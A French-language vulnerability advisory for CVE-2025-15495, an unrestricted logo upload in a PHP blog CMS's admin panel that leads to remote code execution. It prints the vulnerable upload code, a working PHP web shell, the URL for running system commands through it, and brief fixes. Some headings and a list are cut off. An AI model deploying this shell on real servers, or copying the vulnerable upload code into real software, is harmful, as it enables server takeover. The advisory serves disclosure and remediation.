
CVE-2025-15495 - Téléchargement arbitraire de fichier menant à une exécution de code à distance (RCE)
BiggiDroid – Simple PHP Blog CMS Page produit : https://biggidroid.com/product/simple-php-blog/
Critique
CVSS (estimé) : 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Le Simple PHP Blog CMS contient une vulnérabilité de téléchargement de fichier sans restriction dans la fonctionnalité de téléchargement du logo du site du panneau d’administration. Un attaquant authentifié peut télécharger un fichier PHP malveillant déguisé en image, qui est stocké dans un répertoire accessible via le web et exécuté par le serveur, entraînant une exécution de commande à distance.
Panneau d’administration → Mise à jour du logo du site
Extrait de code vulnérable concerné :
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// succès
}
Créez un fichier nommé shell.php :
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php comme fichier logo📌 L’application accepte le fichier PHP sans validation
Après le téléchargement, le fichier est accessible à :
http://127.0.0.1/image/shell.php
Exécutez des commandes système :
http://127.0.0.1/image/shell.php?cmd=dir
Le serveur exécute les commandes du système d’exploitation et renvoie la sortie, confirmant l’exécution de code à distance.





Un attaquant peut :
Cette vulnérabilité peut conduire à une prise de contrôle complète du serveur.
.htaccess / durcissement du serveurRestreindre les extensions de fichiers
$allowed = ['jpg','jpeg','png','gif'];
Valider le type MIME
finfo_file()
Renommer les fichiers téléchargés